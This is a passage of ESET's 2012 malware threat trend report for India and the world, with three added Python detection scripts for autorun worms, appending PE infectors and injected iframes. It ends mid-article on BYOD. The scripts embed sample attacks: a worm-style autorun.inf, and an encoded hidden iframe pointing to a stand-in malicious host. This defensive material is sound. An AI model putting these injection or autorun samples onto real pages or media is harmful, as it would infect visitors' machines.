ESET India Cyber Threat Trends Report Q1


ESET Cyber Threat Trend Report. India & Globe

Quarter I, 2012

Table of Contents

THE TOP TEN THREATS IN INDIA, QUARTER I, 2012
TOP THREATS (INDIA) IN BRIEF
THE TOP TEN THREATS (GLOBAL)
TOP THREATS (GLOBAL) IN BRIEF
SIZING UP THE BYOD SECURITY CHALLENGE
WIN32/CARBERP GANG ON THE CARPET
CARBERP: THE RUSSIAN TROJAN BANKER NOW AIMS FACEBOOK USERS
FROM GEORGIA WITH LOVE: WIN32/GEORBOT INFORMATION STEALING TROJAN AND BOTNET
FAKE SUPPORT, AND NOW FAKE PRODUCT SUPPORT
SUPPORT SCAMMERS (MIS)USING INF AND PREFETCH
RECENT ESET PUBLICATIONS IN INDIA
ABOUT ESET
ADDITIONAL RESOURCES

The Top Ten Threats in India, Quarter I, 2012

TOP Threats (India) in brief:

1. INF/Autorun.gen

A detection for 'autorun.inf' files that may be used by worms when spreading to local, network, or removable drives. When copying themselves to a drive, these worms also create a file named 'autorun.inf' in the root of the targeted drive. The 'autorun.inf' file contains execution instructions for the operating system which are invoked when the drive is viewed using Windows Explorer, thus executing the copy of the worm.

2. HTML/ScrInject.B.Gen

Generic detection of HTML web pages containing obfuscated script or iframe tags that automatically redirect to the malware download.

3. Win32/Sality

Sality is a polymorphic file infector. When run, it starts a service and creates or deletes registry keys related to security activities in the system, so as to ensure that the malicious process is started at each reboot of the operating system. It modifies EXE and SCR files and disables services and processes related to security solutions.

More information relating to this specific signature: http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. Win32/Ramnit.A

Win32/Ramnit.A is a file infector. Files are infected by adding a new section that contains the virus. The virus acquires data and commands from a remote computer or the Internet. It can execute the following operations: capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, shut down/restart the computer.

5. LNK/Autostart.A

Exploit:Win32/CplLnk.A is a generic detection for specially crafted, malicious shortcut files that exploit the vulnerability that is currently exploited by the Win32/Stuxnet family. When a user browses a folder that contains the malicious shortcut using an application that displays shortcut icons, the malware runs instead.

6. INF/Autorun

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.
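The two INF/Autorun entries above describe the mechanism but not how an administrator might triage an autorun.inf found on a drive. The following Python script is an added example written for this page; it is not ESET's detection logic. It parses the [autorun] section by hand (so that junk lines some worms pad the file with do not abort parsing), reports every directive that makes Windows launch a program, and rates the file "suspicious" when a launch target sits in a recycle-bin style path, carries a double extension, or the AutoPlay label imitates Explorer's own "Open folder to view files" prompt. The two embedded autorun.inf texts, the SID-like folder name and the path lists are constructed for illustration.

```python
"""Triage an autorun.inf file for directives that launch code on media access.

Added example for the INF/Autorun entries on this page; it is not ESET's
detection logic. All autorun.inf texts embedded here are constructed.
"""
import os
import re
import sys

# [autorun] keys that make Windows run something when the drive is opened
# (open=, shellexecute=) or when a context-menu verb is chosen
# (shell\<verb>\command=).
LAUNCH_KEYS = {"open", "shellexecute"}
SHELL_CMD_RE = re.compile(r"^shell\\[^\\]+\\command$")
# Hiding places worms commonly use on removable media (illustrative list).
HIDDEN_PATH_RE = re.compile(
    r"recycler|recycled|\$recycle\.bin|system volume information", re.IGNORECASE)
# A benign-looking extension followed by an executable one, e.g. photo.jpg.exe
DOUBLE_EXT_RE = re.compile(
    r"\.(jpe?g|png|gif|txt|docx?|pdf)\.(exe|scr|com|pif|bat|cmd|vbs)$", re.IGNORECASE)
# AutoPlay label text that mimics Explorer's own "Open folder to view files".
FAKE_EXPLORER_RE = re.compile(r"open folder|view files", re.IGNORECASE)


def parse_autorun(text):
    """Return the [autorun] section as {lower-cased key: value}.

    Hand-rolled instead of configparser so that junk lines, which some worms
    pad the file with to confuse naive parsers, are skipped, not fatal.
    """
    entries = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def analyze_autorun(text):
    """Classify an autorun.inf as 'none', 'launches-code' or 'suspicious'.

    Returns (risk, findings). Any launch directive is worth knowing about;
    combined with a hidden path, a double extension or a fake Explorer
    prompt it is rated suspicious.
    """
    entries = parse_autorun(text)
    targets, findings, red_flags = [], [], 0
    for key, value in entries.items():
        if key in LAUNCH_KEYS or SHELL_CMD_RE.match(key):
            targets.append(value)
            findings.append(f"{key}= runs '{value}' when the drive is opened or used")
    action = entries.get("action", "")
    if FAKE_EXPLORER_RE.search(action):
        findings.append(f"action= imitates Explorer's folder prompt: '{action}'")
        red_flags += 1
    for target in targets:
        if HIDDEN_PATH_RE.search(target):
            findings.append(f"launch target hides in a system/recycle path: '{target}'")
            red_flags += 1
        if DOUBLE_EXT_RE.search(target):
            findings.append(f"launch target uses a double extension: '{target}'")
            red_flags += 1
    if not targets:
        return "none", findings
    return ("suspicious" if red_flags else "launches-code"), findings


def scan_drive_root(root):
    """Analyze the autorun.inf at the root of a mounted drive, if present."""
    path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(path):
        return "none", []
    with open(path, "r", encoding="latin-1", errors="replace") as fh:
        return analyze_autorun(fh.read())


# Constructed samples: a typical CD installer autorun and a worm-style one.
BENIGN_INSTALLER = """[autorun]
icon=setup.exe,0
label=Product Installer
"""

WORM_STYLE = r"""[AutoRun]
;padding line with no key
open=RECYCLER\S-1-5-21-0000\photo.jpg.exe
shell\open\command=RECYCLER\S-1-5-21-0000\photo.jpg.exe
action=Open folder to view files
UseAutoPlay=1
"""

if __name__ == "__main__":
    for label, text in (("installer", BENIGN_INSTALLER), ("worm-style", WORM_STYLE)):
        risk, notes = analyze_autorun(text)
        print(f"{label}: {risk}")
        for note in notes:
            print("  -", note)
    for root in sys.argv[1:]:          # e.g. python autorun_triage.py E:\ F:\
        print(root, scan_drive_root(root))
```

Run it with one or more drive roots as arguments to check mounted media; with no arguments it reports on the two embedded samples. Note that a launch directive alone is also how legitimate installer discs work, which is why the script separates "launches-code" from "suspicious" rather than treating every open= as malicious.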

7. HTML/Iframe.B

HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

8. Win32/Autoit

Win32/Autoit is a worm that spreads via removable media, and some of its variants also spread through MSN. It may arrive on a system as a file downloaded from a malicious web site. It may also be dropped by other malware. After infecting a system, it searches for all executable files and replaces them with a copy of itself. It copies itself to local disks and network resources. Once executed, it downloads additional threats or variants of itself.

9. Win32/Toolbar.Babylon

ESET classifies this class of threats as PUA (potentially unwanted application). A potentially unwanted application is a program that contains adware, installs toolbars or has other unclear objectives. There are some situations where a user may feel that the benefits of a potentially unwanted application outweigh the risks. For this reason, ESET assigns them a lower-risk category compared to other types of malicious software, such as trojan horses or worms. While installing your ESET security software, you can decide whether to enable detection of potentially unwanted applications.

10. Win32/Virut.NBP

Win32/Virut.NBP is a polymorphic file infector. The virus connects to the IRC network. It can be controlled remotely. The virus searches for executables with one of the following extensions: .exe, .scr. Executables are infected by appending the code of the virus to the last section. The host file is modified in a way that causes the virus to be executed prior to running the original code.
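The Virut and Sality entries both describe the same structural fingerprint: virus code appended to the last section of a PE file and the entry point redirected so the virus runs before the host code. The following Python script is an added example written for this page (it is not ESET's detection logic) that turns that description into a header-level heuristic: it parses the COFF and optional headers with struct, locates the section containing AddressOfEntryPoint, and flags an entry point that falls in the last section, in a section that is both writable and executable, or outside every section. Because the check needs a PE to run on, build_sample_pe() constructs two header-only PE32 images, one clean and one laid out the way an appending infector leaves a host; both are constructed test data, not real programs.

```python
"""Heuristic check for appending file infectors in a PE executable.

Added example for the Win32/Virut.NBP and Win32/Sality entries on this page;
it is not ESET's detection logic. The sample PE images are constructed in
build_sample_pe() (headers only) so the check can run without a real binary.
"""
import struct
import sys

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def read_sections(data):
    """Parse the PE headers and return (entry_rva, [section dicts])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt_header = e_lfanew + 24
    # AddressOfEntryPoint is at offset 16 of both PE32 and PE32+ optional headers.
    entry_rva = struct.unpack_from("<I", data, opt_header + 16)[0]
    sections = []
    table = opt_header + opt_size
    for i in range(num_sections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, data, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "va": va,
            "size": max(vsize, raw_size),
            "chars": chars,
        })
    return entry_rva, sections


def analyze_pe(data):
    """Return the entry-point section and the heuristic flags raised.

    Appending infectors (Virut, Sality) typically grow the last section and
    point AddressOfEntryPoint into it; normal compiler output enters in
    .text, which is neither the last section nor writable.
    """
    entry_rva, sections = read_sections(data)
    flags, hit = [], None
    for idx, sec in enumerate(sections):
        if sec["va"] <= entry_rva < sec["va"] + sec["size"]:
            hit = idx
            break
    if hit is None:
        flags.append("entry-outside-any-section")
    else:
        chars = sections[hit]["chars"]
        if hit == len(sections) - 1 and len(sections) > 1:
            flags.append("entry-in-last-section")
        if chars & IMAGE_SCN_MEM_WRITE and chars & IMAGE_SCN_MEM_EXECUTE:
            flags.append("entry-section-writable-executable")
        if not chars & IMAGE_SCN_MEM_EXECUTE:
            flags.append("entry-section-not-executable")
    return {
        "entry_rva": entry_rva,
        "entry_section": sections[hit]["name"] if hit is not None else None,
        "flags": flags,
    }


def build_sample_pe(infected):
    """Construct a minimal PE32 image consisting of headers only (test data).

    infected=False: entry point in .text. infected=True: the last section
    (.data) is made executable and the entry point moved into it, mimicking
    the layout an appending infector leaves behind.
    """
    # [name, VirtualAddress, VirtualSize, SizeOfRawData, PointerToRawData, Characteristics]
    sections = [
        [b".text", 0x1000, 0x1000, 0x400, 0x400, 0x60000020],   # code | exec | read
        [b".data", 0x2000, 0x0200, 0x200, 0x800, 0xC0000040],   # data | read | write
    ]
    entry = 0x1010
    if infected:
        sections[-1][5] |= IMAGE_SCN_MEM_EXECUTE
        entry = 0x2150
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0                                            # PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<I", opt, 16, entry)                     # AddressOfEntryPoint
    table = b"".join(struct.pack(SECTION_HDR, n, vs, va, rs, rp, 0, 0, 0, 0, ch)
                     for n, va, vs, rs, rp, ch in sections)
    return dos + b"PE\0\0" + coff + bytes(opt) + table


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            print(analyze_pe(fh.read()))
    else:
        for infected in (False, True):
            print("infected" if infected else "clean", analyze_pe(build_sample_pe(infected)))
```

Treat the flags as triage hints, not verdicts: runtime packers and some installers also place the entry point in a late, writable section, so a hit should be confirmed by scanning the file with a product that carries the actual family signatures.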

2. The Top Ten Threats (Global) (March 2012)

TOP Threats (Global) in brief:

1. HTML/ScrInject.B (see above)

2. INF/Autorun (see above)

3. HTML/Iframe.B

HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.
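HTML/ScrInject.B, HTML/Iframe.B, JS/Iframe.AS and JS/Redirector on this page all describe the same web-side pattern: a frame or script injected into a legitimate page that silently sends the browser to a malware download. The following Python script is an added example for those entries, written for this page and not ESET's detection logic. Using only the standard library, it walks an HTML document and reports iframes that are zero-sized or hidden by CSS, and inline scripts that call a decoder such as unescape() or eval(), carry a large percent- or hex-escaped blob, or, once one layer of unescape('...') is decoded, turn out to write an iframe or set the browser location. The sample page and its hostnames (ads.example.test, bad.example.test) are constructed for illustration.

```python
"""Flag hidden iframes and obfuscated redirect scripts in an HTML page.

Added example for the HTML/Iframe.B, HTML/ScrInject.B and JS redirector
entries on this page; it is not ESET's detection logic. The sample HTML and
its hostnames are constructed.
"""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# CSS that makes a frame invisible or pushes it far off-screen.
HIDDEN_STYLE_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}px",
    re.IGNORECASE)
# Calls that typically decode and run a hidden payload.
DECODER_MARKERS = ("eval(", "unescape(", "fromcharcode(")
ESCAPE_RE = re.compile(r"%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}", re.IGNORECASE)
UNESCAPE_LITERAL_RE = re.compile(r"unescape\(\s*['\"]([^'\"]+)['\"]\s*\)", re.IGNORECASE)
# What a decoded payload looks like when its job is to redirect the browser.
REDIRECT_RE = re.compile(
    r"<iframe|(?:window|top|document)\.location|location\.(?:href|replace)",
    re.IGNORECASE)


def _tiny(value):
    """True for width/height attributes of 0 or 1 pixels (a hidden frame)."""
    digits = re.match(r"\s*(\d+)", value or "")
    return digits is not None and int(digits.group(1)) <= 1


class InjectFinder(HTMLParser):
    """Collect findings for iframes and inline scripts while parsing."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None   # buffer for the inline script being read

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            reasons = []
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("zero-size")
            if HIDDEN_STYLE_RE.search(a.get("style", "")):
                reasons.append("hidden-by-style")
            if reasons:
                self.findings.append(
                    {"kind": "iframe", "detail": a.get("src", ""), "reasons": reasons})
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            self._inspect_script("".join(self._script))
            self._script = None

    def _inspect_script(self, code):
        lowered = code.lower()
        reasons = []
        if any(marker in lowered for marker in DECODER_MARKERS):
            reasons.append("decoder-call")
        if len(ESCAPE_RE.findall(code)) >= 8:
            reasons.append("escaped-blob")
        # Peel one layer: decode unescape('...') literals and inspect the result.
        for blob in UNESCAPE_LITERAL_RE.findall(code):
            if REDIRECT_RE.search(unquote(blob)):
                reasons.append("decoded-payload-redirects")
                break
        if reasons:
            self.findings.append(
                {"kind": "script", "detail": code.strip()[:60], "reasons": reasons})


def scan_html(text):
    """Return the list of findings for one HTML document."""
    finder = InjectFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


# Constructed sample: a visible ad frame, a hidden frame, and an injected
# script that writes a second hidden frame after decoding it.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://ads.example.test/banner" width="300" height="250"></iframe>
<iframe src="http://bad.example.test/load.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fbad.example.test%2Fgate.php%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print(finding["kind"], finding["reasons"], finding["detail"])
```

The one-layer decode is deliberate: real injections often nest several encodings, and a reviewer who sees "decoded-payload-redirects" on the first layer has enough to pull the page for closer inspection without the script having to execute anything.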

4. Win32/Conficker

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

5. JS/Agent

The trojan displays dialogs that ask the user to purchase a specific product/service. After the product/service is purchased, the malware removes itself from the computer. The trojan is probably part of other malware.

6. JS/Iframe.AS

JS/Iframe.AS is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

7. Win32/Sirefef

Win32/Sirefef.A is a trojan that redirects results of online search engines to web sites that contain adware.

8. Win32/Sality (see above)

9. Win32/Dorkbot

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.

The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send the gathered information to a remote machine. This kind of worm can be controlled remotely.

10. JS/Redirector

JS/Redirector is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

Threats India vs Globe (January, February, March 2012)

Sizing Up the BYOD Security Challenge

Stephen Cobb, ESET Security Evangelist

On the plus side of BYOD, you may get more work from people when they can work in more places and at more times of the day (from the breakfast table in the morning to the kitchen table at night and the coffee shop in between). There can be cost savings too: equipment outlays can be reduced if employees use their own devices instead of the company buying them.

At the same time, IT security managers must weigh those benefits against the security risks that come with these devices, plus the cost of bringing them into line with existing security policies and compliance standards. For example, what are the legal ramifications of an employee's personal laptop going missing when it contains your customer list or sensitive internal correspondence? To help companies get a handle on the scale and scope of these risks, ESET engaged Harris Interactive to survey some 1,300 adults in America who are currently employed. We found that more than 80 percent of them use some kind of personally owned electronic device for work-related functions. Many of these devices are older technologies like laptop and desktop computers, but smartphones and tablets are already a significant part of the BYOD phenomenon.

Unfortunately, the survey paints a worrying picture of security on these devices; for example, encryption of company data is only happening on about one third of them. One third of those surveyed responded that company data is not encrypted when it is